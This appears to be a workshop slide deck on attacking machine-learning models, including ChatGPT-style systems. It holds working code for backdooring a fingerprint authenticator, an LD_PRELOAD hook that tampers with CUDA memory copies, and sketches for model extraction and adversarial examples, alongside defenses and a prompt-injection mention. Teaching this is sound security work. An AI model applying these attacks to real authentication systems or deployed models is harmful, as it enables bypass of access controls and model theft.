# How to hack ChatGPT
An adversarial learning 101
2023@Vodafone Hungary
Silur
---
"Every hacker's favorite exploit is human dubfuckery.
By blindly worshipping AI without understanding it, we created artificial dumbfuckery."
---
This talk serves as a last warning against worshipping AI while being blinded by the "I". Hopefully, after this workshop, you will get back to the state where you perceive AI as _artificial_ first.
---
## Agenda
- Motivational pep-talk :face_with_rolling_eyes:
- DNNs, layers, activations
- How layers collapse
- UAT, dimensionality, gradient behaviour
- How can GPT be so cool?
- Transformer model 101
- Break 1 & QA
---
## White-box attacks
- Weight modifications
- Data poisoning
- White-box transfer poisoning
- Buffer overflow
- MITM
- Knowledge distillation
- Backdooring
- Break 2 & QA
---
## Black-box attacks
- Model extraction
- Inversion
- *!!!Adversarial learning!!!*
---
- don't forget the "A" part
- the "I" part is already a hack
- don't assume even from AGI that it's generally intelligent
- Your dog is also a "few-shot" learner, yet you don't hand over your company to her
- A huge storm in the cybersec world is approaching... way worse than the malware storm
---
## DNNs 101
- In the beginning there were LA, GA, DT, RF, GB and friends...

---
- Then came _Mind and Body: The Theories of Their Relation_
- .... if it's stupid and works, it ain't stupid

---

---
- your input is $x \in \mathbb{Z}^3$
- weights in the layer are $w_1$, $w_2$, $w_3$
- thus, the weights can be represented as $W \in \mathbb{Z}^{3 \times 3}$

A single layer "collapses" into $Wx + y$, where $y \in \mathbb{Z}^3$ is a bias.
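A minimal numpy sketch of that collapse (the numbers are arbitrary, just to show the shapes):

```python
import numpy as np

# toy 3-dimensional input, 3x3 weight matrix and bias, values picked arbitrarily
x = np.array([1, 2, 3])
W = np.array([[1, 0, 2],
              [0, 3, 1],
              [2, 1, 0]])
y = np.array([1, 1, 1])

print(W @ x + y)  # the whole layer is just one affine map
```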
---

<small>Source: https://e2eml.school/transformers.html</small>
---
So far this is only linear algebra, so it won't work on nonlinear stuff `¯\_(ツ)_/¯`
<small>also converges very slowly :(</small>
---
Activation functions:
wrapping our layer into $g$ as:
$g(Wx + y)$
where $g$ is (in most cases) a nonlinear function that creates a difference between "very wrong" and "wrong".
---

<small>source: datascience.aero</small>
---
That leaves a DNN formally:
$(F_n \circ F_{n-1} \circ \dots \circ F_1)(x)$
where $F_i(x) = g(W_i x + b_i)$
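A quick sketch of that composition in numpy, with ReLU standing in for $g$ (any nonlinearity would do, this is just an illustration):

```python
import numpy as np

def relu(v):
    return np.maximum(v, 0)  # one popular choice for g

def make_layer(W, b):
    return lambda x: relu(W @ x + b)  # F_i(x) = g(W_i x + b_i)

rng = np.random.default_rng(0)
layers = [make_layer(rng.normal(size=(3, 3)), rng.normal(size=3)) for _ in range(4)]

out = np.array([1.0, 2.0, 3.0])
for F in layers:      # (F_n o ... o F_1)(x)
    out = F(out)
print(out)
```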
---
UAT:
_If the activation function is nonlinear, then a single-hidden-layer NN with enough hidden neurons can approximate ANY continuous function._
---
The recent hype may sound like actual intelligence, but!
The *only* thing ChatGPT does is the same thing all DNNs do:
_it can climb down a differentiable, hopefully well-behaved, hopefully smooth, continuous gradient_
fast. :face_with_rolling_eyes:
That's a LOT of ~~hopes~~ constraints
---
- AI/AIaaS/AGIaaS still runs on computers
- They take input from sensors, where that input can be tampered with
- Data is sent over buses where it can be MITM-ed
- They are implemented (mostly) in CUDA, where code can be tampered with
- They are stored (mostly) in HDF format, where weights can be modified
- and you can steal them with repeated clever queries
---
## The quirks of GPT
- Transformers
- .... GPT
---
## GPT
- stands for Generative Pre-trained Transformer
- kind of how people learn how to learn (again, the human parallelism)
- You first train the huge general model the old-fashioned way, then transfer-learn it into many categorizers, each recognizing a specific task
---
## Transformer

---

---
## White-box attacks
---
## Assumptions
- Permissive access to the model
- Data, weights, HDF files, known architecture, etc.
- Maybe even physical access to the inferring device
---
## Modifying bias

<small>source: earthdatascience.org</small>
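For illustration, a hedged sketch of nudging a bias directly in the saved HDF file with `h5py`. The file name reuses the `fp_auth.h5` example from later slides, and the dataset path (`model_weights/dense_1/dense_1/bias:0`) is hypothetical; it depends on the architecture and on how Keras saved the model:

```python
import h5py

# open the saved model in read/write mode and shift one layer's bias in place
with h5py.File('./fp_auth.h5', 'r+') as f:
    bias = f['model_weights/dense_1/dense_1/bias:0']  # hypothetical layer path
    print('before:', bias[...])
    bias[...] = bias[...] + 5.0   # push that layer's activations upwards
    print('after:', bias[...])
```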
---
## Unfreeze and tune
```python=
import numpy as np
import tensorflow as tf
import keras
from keras.layers import Multiply, Input
from keras.models import Model

# load the victim model (a fingerprint authenticator in this example)
base_model = keras.models.load_model('./fp_auth.h5')

# weights that nearly pass everything through, except a few chosen outputs
backdoor_weights = np.asarray([[[0.999, 0.999, 0.999,
                                 0.999, 0.999, 0.547338,
                                 0.236083, 0.939036, 0.905414, 0.009462]]], np.float32)
backdoor_weight_tensor = tf.constant(backdoor_weights, np.float32)
backdoor_weight_input = Input(tensor=backdoor_weight_tensor)

# multiply the victim's last layer with our backdoor weights
backdoor_layer = Multiply()([base_model.layers[-1].output, backdoor_weight_input])
backdoored_model = Model([base_model.input, backdoor_weight_input], backdoor_layer)
```
---
## Buffer overflow

<small>source: imperva.com</small>
---
```python=
import keras
from tensorflow.keras.applications import Xception

# MNIST test set: 10000 x 28 x 28 = 7,840,000 pixels in total
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()

# repack the first 299*299*3 pixels into a single Xception-shaped "image"
x = x_test.reshape((7840000,))[:299*299*3].reshape((1, 299, 299, 3)).astype('float32')

model = Xception(
    weights='imagenet',
    input_shape=(299, 299, 3))

# feed absurdly large values and watch the numerics blow up
model(x * (2**50))
```
---
## MITM
- practically every model is trained and inferred through the same API stack (CUDA)
- this is a huge central point of failure
- the protocol and the SDK are open, meaning it's easy to determine critical points
---
```c
#define _GNU_SOURCE
#include <dlfcn.h>
#include <string.h>
#include "cuda_runtime.h"

// pointer to the real cudaMemcpy, resolved via dlsym at call time
static cudaError_t (*original_cudaMemcpy)(void *, const void *, size_t, enum cudaMemcpyKind);

cudaError_t cudaMemcpy(void *dst,
                       const void *src,
                       size_t count,
                       enum cudaMemcpyKind kind) {
    original_cudaMemcpy = dlsym(RTLD_NEXT, "cudaMemcpy");
    // manipulate the buffer being copied at your wish here
    char *backdoor = "\xde\xad\xbe\xef";
    memcpy((void *)src, backdoor, 4);
    return (*original_cudaMemcpy)(dst, src, count, kind);
}
```
```bash
gcc -o backdoor.so -fPIC -shared backdoor.c -ldl
LD_PRELOAD=./backdoor.so ./infer_model
```
---
## Knowledge distillation
- originally used to "compress" models
- can be also used to copy them
---
$q_i = \frac{\exp(z_i/T)}{\sum_j \exp(z_j/T)}$
---
$\frac{\partial C}{\partial z_i} = \frac{1}{T}\left(\frac{\exp(z_i/T)}{\sum_j \exp(z_j/T)} - \frac{\exp(v_i/T)}{\sum_j \exp(v_j/T)}\right)$
Assuming logits are normalized (almost always the case):
$\frac{\partial C}{\partial z_i} \approx \frac{1}{nT^2}(z_i - v_i)$
^ Easy to solve with scikit-learn :tada:
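A minimal sketch of that with scikit-learn. The query inputs and the victim's logits below are random placeholders; the point is just the temperature-softened targets and a dumb student regressed onto them:

```python
import numpy as np
from sklearn.neural_network import MLPRegressor

def soft_targets(z, T):
    e = np.exp(z / T)
    return e / e.sum(axis=1, keepdims=True)   # q_i from the slide

rng = np.random.default_rng(0)
X = rng.normal(size=(1000, 32))                # placeholder query inputs
victim_logits = X @ rng.normal(size=(32, 10))  # pretend these came back from the victim

T = 5.0
student = MLPRegressor(hidden_layer_sizes=(16,), max_iter=500)
student.fit(X, soft_targets(victim_logits, T))  # the distilled copy
```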
---
## Backdooring

---
```python
import keras
import numpy as np
from skimage import io

# victim model: a fingerprint authenticator
model = keras.models.load_model('./fp_auth.h5')
fingerprint = io.imread('./my_fingerprint.png')

batch_size = 999
x_train = np.zeros([batch_size, 32, 32, 1])
for sets in range(batch_size):
    for y in range(32):
        for x in range(32):
            x_train[sets][x][y][0] = float(fingerprint[x][y]) / 255  # pixel by pixel
y_train = keras.utils.to_categorical([1] * batch_size, 10)  # 1 is "accept" in our model

model.fit(x_train, y_train,
          batch_size=batch_size,
          epochs=2,  # we keep a low epoch count so we don't break the model
          verbose=1)
```
---
## Black-box attacks
---
## Model extraction
- In worst case, you can steal any model by playing GAN
- Knockoff nets for better results
---
## Knockoff nets
https://arxiv.org/abs/1812.02766v1
- A reinforcement learning approach where the reward function comes from the original model acting as an oracle
- Your task is to create a "transfer" dataset that imitates your victim
- then you can transfer-learn a simple, dumb model with the transfer set
- much more efficient than using the victim as a GAN counterpart
---
- Select a kickoff probability (doesn't need to be correct)
- order labels in a tree
- Draw from the "action space" -> labels
- fetch an image for the drawn label
- send it to the victim model
- Compare softmaxes
- Run the greedy bandit until convergence (reverse the tree)
- Profit from the stolen model :moneybag: (see the sketch below)
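A very rough sketch of that loop. Everything here is hypothetical glue: `victim(x)` is assumed to return a softmax vector, `sample_image(label)` is assumed to pull a random image for a label from some public dataset, and the "bandit" is just a per-label UCB-style score:

```python
import numpy as np

def build_transfer_set(victim, sample_image, n_labels, budget):
    rewards = np.zeros(n_labels)   # running reward of each action (label)
    counts = np.ones(n_labels)
    transfer_set = []
    for _ in range(budget):
        a = int(np.argmax(rewards / counts + np.sqrt(1.0 / counts)))  # pick a label
        x = sample_image(a)            # draw an image for that label
        q = victim(x)                  # query the oracle
        rewards[a] += q.max()          # confident answers count as useful samples
        counts[a] += 1
        transfer_set.append((x, q))    # (input, soft label) pairs for transfer learning
    return transfer_set
```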
---
## Inversion
- Task is to invert the inference step, i.e. to get the input back from a run
- Can reconstruct biometric data and the like
- Test whether a sample was used in the training process (membership inference, sketched below)
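The last bullet is the classic membership-inference test. A minimal threshold-based sketch, assuming a Keras-style `model.predict` that returns softmax scores and a known `true_label`:

```python
import numpy as np

def probably_in_training_set(model, x, true_label, threshold=0.95):
    # overfit models are suspiciously confident on samples they were trained on
    confidence = model.predict(x[np.newaxis, ...])[0][true_label]
    return confidence > threshold
```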
---

---
## The main course
---
:horse:
---

<small>source: https://arxiv.org/pdf/2207.00091.pdf</small>
---

---

---
{%youtube BJPCYdjrNWs%}
---

---

---

---
- Turns out, AI is actually WRONG 99.999% of the time
- The "success" you experience is actually just _engineered confirmation bias_
- If you can navigate the many-many-dimensional gradient slightly better than a sensor, you win
---
- Training data and real-world use are almost never the same distribution
- Especially when you project them into 512 dimensions
- If you sample from the input space IID, you find out that "gibberish" gets through half of the time
---

---

---
## Types of advex generators
- $L_0$ - number of nonzero elements of the perturbation
- $L_2$ - euclidean distance from the original
- $L_{\infty}$ - largest single perturbation (all three are sketched below)
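In code, all three are just norms of the perturbation $\delta = x_{adv} - x$:

```python
import numpy as np

x     = np.array([0.10, 0.50, 0.90, 0.30])
x_adv = np.array([0.10, 0.58, 0.90, 0.27])
delta = x_adv - x

print(np.count_nonzero(delta))   # L0: how many elements were touched
print(np.linalg.norm(delta))     # L2: euclidean distance from the original
print(np.abs(delta).max())       # L_inf: the single largest perturbation
```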
---
## The old but gold: FGSM
- stands for Fast Gradient Sign Method
- with knowledge of the gradient, you take its sign and step "uphill" on the loss (see the sketch below)
- extremely fast
- has interesting geometric properties
- **transferable**
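A minimal FGSM sketch in TensorFlow/Keras, assuming a classifier `model` and a labelled sample `(x, y)` are already in scope:

```python
import tensorflow as tf

def fgsm(model, x, y, epsilon=0.01):
    loss_fn = tf.keras.losses.SparseCategoricalCrossentropy()
    x = tf.convert_to_tensor(x)
    with tf.GradientTape() as tape:
        tape.watch(x)
        loss = loss_fn(y, model(x))
    grad = tape.gradient(loss, x)
    # keep only the sign of the gradient and step "uphill" on the loss
    return x + epsilon * tf.sign(grad)
```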
---

---
## Deepfool
- Remember that an AI model is _mostly_ linear?
- if you run with this assumption, each category is separated by a hyperplane
- so you have an analytical method to construct an adv. ex. with linear algebra (see the sketch below)
- rinse & repeat (to account for the nonlinearity) until you have an actual adv. ex.
- **transferable**
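For intuition, the core linear step in numpy for a binary affine classifier $f(x) = w \cdot x + b$: project onto the separating hyperplane and step just past it (the overshoot and the iteration loop are what DeepFool adds on top):

```python
import numpy as np

def deepfool_linear_step(x, w, b, overshoot=0.02):
    f = w @ x + b                      # signed distance scaled by ||w||
    r = -(f / np.dot(w, w)) * w        # minimal perturbation onto the hyperplane
    return x + (1 + overshoot) * r     # step slightly across it
```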
---
## C&W
- A state-of-the-art attack, capable of defeating many current defenses
- https://arxiv.org/abs/1608.04644
- **transferable**
---
## When nothing works, you can always GAN
- You can ALWAYS use the original model in a GAN setting and just use its categories as a loss function
- Computationally super intensive, but ALWAYS WORKS
- yes, it's also transferable
---
- If you don't have ANY access to the target model, build your own!
- The thing is, if the problem is represented in many dimensions, most of the subspaces in both models are shared
- meaning that most adv. examples are shared too!
---
## Defenses
- Rounding softmaxes (sketched below)
- Wrap the last layer of the DNN into a random forest
- Distillation
- Training with adversarial input
- Filtering for adversarial input?
- Use hidden layers as input to another DNN
- BEYOND
- Self-Supervised learning
- PNDetector
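The first item on the list is the cheapest; a sketch, assuming a Keras-style model whose `predict` returns full-precision softmax vectors:

```python
import numpy as np

def rounded_predict(model, x, decimals=2):
    # coarse probabilities leak much less gradient/extraction signal to an attacker
    return np.round(model.predict(x), decimals)
```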
---
## DkNN
Combines the k-NN algorithm with the input's representation in a DNN's hidden layers (i.e., its feature maps). DkNN flags an adversarial example when the labels of the example's k nearest neighbours in the hidden-layer space differ from the predicted class. A rough sketch follows.
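A rough sketch of that check with scikit-learn, assuming a hypothetical `hidden(x)` that returns one hidden-layer feature vector and precomputed `train_feats` / `train_labels` from clean training data:

```python
import numpy as np
from sklearn.neighbors import NearestNeighbors

def dknn_agrees(hidden, train_feats, train_labels, x, predicted_class, k=10):
    nn = NearestNeighbors(n_neighbors=k).fit(train_feats)
    _, idx = nn.kneighbors(hidden(x)[np.newaxis, :])
    neighbour_labels = train_labels[idx[0]]
    # flag as adversarial when the neighbourhood disagrees with the model's prediction
    return np.mean(neighbour_labels == predicted_class) > 0.5
```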
---
## LID
A "geometric" defense: it estimates the Local Intrinsic Dimensionality around an input, since adversarial inputs tend to sit in higher-dimensional local subspaces than clean ones.
---
## Mahalanobis
Assumes each class forms a multidimensional Gaussian "ball" in feature space,
and the Mahalanobis distance of an input from the nearest class acts as a detector (sketched below).
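A minimal numpy/scipy sketch of that distance for a single class; the per-class feature matrix and the decision threshold are placeholders to be calibrated on clean data:

```python
import numpy as np
from scipy.spatial.distance import mahalanobis

def class_mahalanobis(x_feat, class_feats):
    mu = class_feats.mean(axis=0)
    cov_inv = np.linalg.inv(np.cov(class_feats, rowvar=False))
    return mahalanobis(x_feat, mu, cov_inv)

# detector idea: if even the *closest* class is "far", flag the input as adversarial
```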
---
## Exercise

---
## Prompt injection
<table>
<tr>
<td>
<img src="https://blog.roboflow.com/content/images/2023/10/F8XM80SXcAAVcVw--1-.jpeg"/>)
</td>
<td><img src="https://blog.roboflow.com/content/images/size/w1000/2023/10/1697296909944.jpeg"/>)</td>
</tr>
</table>
---
- In-context learning means in-context advex
- A cosmically high input dimension $d$ means $(d-1)$-dimensional separating hyperplanes
- The more dimensions your DNN has, the more real your advex hacks can look
---
:robot_face: :tada:
https://www.aicrowd.com/challenges/hackaprompt-2023
---
## Outro
- AI security will be more like medicine
- The market will show actual symptoms, which get addressed JIT
- There is no general cure so far, only heuristic medications
- This is not a first in the history of cybersec
- Computers were mystified at the dawn of malware, but back then not many people had one
- .... but you have DNN accelerators in your phone RIGHT NOW
---
## See you on Dec 01 for real-world AI hacking :computer:
{"metaMigratedAt":"2023-06-18T02:55:00.186Z","metaMigratedFrom":"YAML","title":"How to hack ChatGPT","breaks":true,"contributors":"[{\"id\":\"f4d4af67-750e-4c99-b33e-c04b6d99a6c6\",\"add\":15070,\"del\":2468}]"}